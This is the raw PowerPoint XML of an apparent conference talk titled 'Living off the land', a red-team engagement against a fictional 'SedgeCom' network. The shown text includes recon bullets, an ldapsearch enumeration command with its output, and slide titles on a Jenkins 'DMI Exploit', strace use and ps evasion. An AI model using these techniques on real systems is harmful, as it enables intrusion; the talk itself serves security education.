            <a:ext cx="587184" cy="58718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CC6CE614-555C-654E-99BC-0942BCB4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9854" y="3673795"/>
            <a:ext cx="858364" cy="132908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D2356EB-C056-0E43-9DB3-C705A529B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1595" y="2016661"/>
            <a:ext cx="858364" cy="1329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81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70"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="4067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C6FA-5C99-5643-9ADD-06CC2161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16D9-25C8-DF48-A7C0-D881DD5D4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Passive recon using public data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Avoid touching the target infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Search engines, whois, Shodan, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Certificate transparency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852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74"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="389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D967A9-7E36-7D46-A64A-110143E3018B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1628763" y="578012"/>
            <a:ext cx="8584041" cy="4379723"/>
            <a:chOff x="1892235" y="547016"/>
            <a:chExt cx="8584041" cy="43797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09BAF5-7D5C-7347-9E55-D7FD066EF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2235" y="864516"/>
              <a:ext cx="8584041" cy="406222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DD84DD-909F-074D-9CE9-E67F11A9D4E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1892235" y="547016"/>
              <a:ext cx="8584041" cy="317500"/>
              <a:chOff x="1892235" y="547016"/>
              <a:chExt cx="8584041" cy="3175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1325509-2255-AC43-8897-B99A40A67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2235" y="547016"/>
                <a:ext cx="4140200" cy="3175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C4344C-071E-F645-99C4-D705CA48C6E2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6032435" y="547016"/>
                <a:ext cx="4443841" cy="317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CF2305-61AC-E541-BA53-37C011EEF0D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952344" y="3294886"/>
            <a:ext cx="1936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%.sedgemaze.com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A7B83A-7070-A24B-8C1D-67A74AB1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14104" y="5275235"/>
            <a:ext cx="10013358" cy="1281509"/>
          </a:xfr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53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17"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="95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F367-8715-234B-B39F-375B6CB0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Internal Discovery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3780A-8A0C-1A4C-9D5F-407C1CA16BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1776984" y="2569465"/>
            <a:ext cx="8183880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US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kali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:~# ldapsearch -W –LLL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-H ldaps://ds.sedgemaze.com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-D 'uid=alice,ou=people,dc=sedgemaze,dc=com'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-b 'ou=people,dc=sedgemaze,dc=com'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'uid=alice'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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LDAP Password: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dn: uid=alice,ou=people,dc=sedgemaze,dc=com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 Developer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loginShell: /usr/sbin/nologin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memberOf: cn=jenkins,ou=groups,dc=sedgemaze,dc=com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45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74"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="9807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18CC-E668-AF4F-A63E-E9DB63D9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Jenkins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AF5F4-14A4-0F4D-8F2E-B4CFD0A3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1136" y="2611531"/>
            <a:ext cx="2242391" cy="3101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9ED94-08A4-A94F-BE41-29F526958F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4848282" y="3411256"/>
            <a:ext cx="60795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Very popular automation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Easy to misconfigure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Dev pipelines yield low-hanging fruit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177320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71"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="2827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5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25.2|3.5|63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|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2.3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|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61.2|3.3|3.6|0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9|7.5|9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8.1|1.6|7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9.8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0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1|13.2|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|21.1|10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|21.1|10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.3|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.2|6|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3|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9.2|29.2|17.1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9.2|29.2|17.1|8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9.2|29.2|17.1|8.6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{E0AD6605-77CD-AE49-A866-26F779DFA20A}tf10001120</Template>
  <TotalTime>12408</TotalTime>
  <Words>2393</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>301</Paragraphs>
  <Slides>37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Athelas</vt:lpstr>
      <vt:lpstr>Baskerville</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Parcel</vt:lpstr>
      <vt:lpstr>Living off the land</vt:lpstr>
      <vt:lpstr>Background</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>SedgeCom Network</vt:lpstr>
      <vt:lpstr>External Discovery</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Internal Discovery</vt:lpstr>
      <vt:lpstr>Jenkins</vt:lpstr>
      <vt:lpstr>Jenkins</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>DMI Exploit</vt:lpstr>
      <vt:lpstr>DMI Exploit</vt:lpstr>
      <vt:lpstr>DMI Exploit</vt:lpstr>
      <vt:lpstr>DMI Exploit</vt:lpstr>
      <vt:lpstr>DMI Exploit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Not so Fast</vt:lpstr>
      <vt:lpstr>Not So Fast</vt:lpstr>
      <vt:lpstr>Offensive Forensics</vt:lpstr>
      <vt:lpstr>Strace</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Back to LDAP</vt:lpstr>
      <vt:lpstr>ps evasion</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ps evasion</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Endgame</vt:lpstr>
      <vt:lpstr>Red Team Wins!</vt:lpstr>
      <vt:lpstr>Red Team Wins!</vt:lpstr>
      <vt:lpstr>Object Lessons</vt:lpstr>
      <vt:lpstr>Contact  reiser@defensivecomputing.io github.com/adamreiser twitter.com/timewarpadam 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off the land</dc:title>
  <dc:subject/>
  <dc:creator/>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>gem</cp:lastModifiedBy>
  <cp:revision>569</cp:revision>
  <cp:lastPrinted>2018-09-23T04:20:57Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-17T21:09:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-09T17:30:48Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>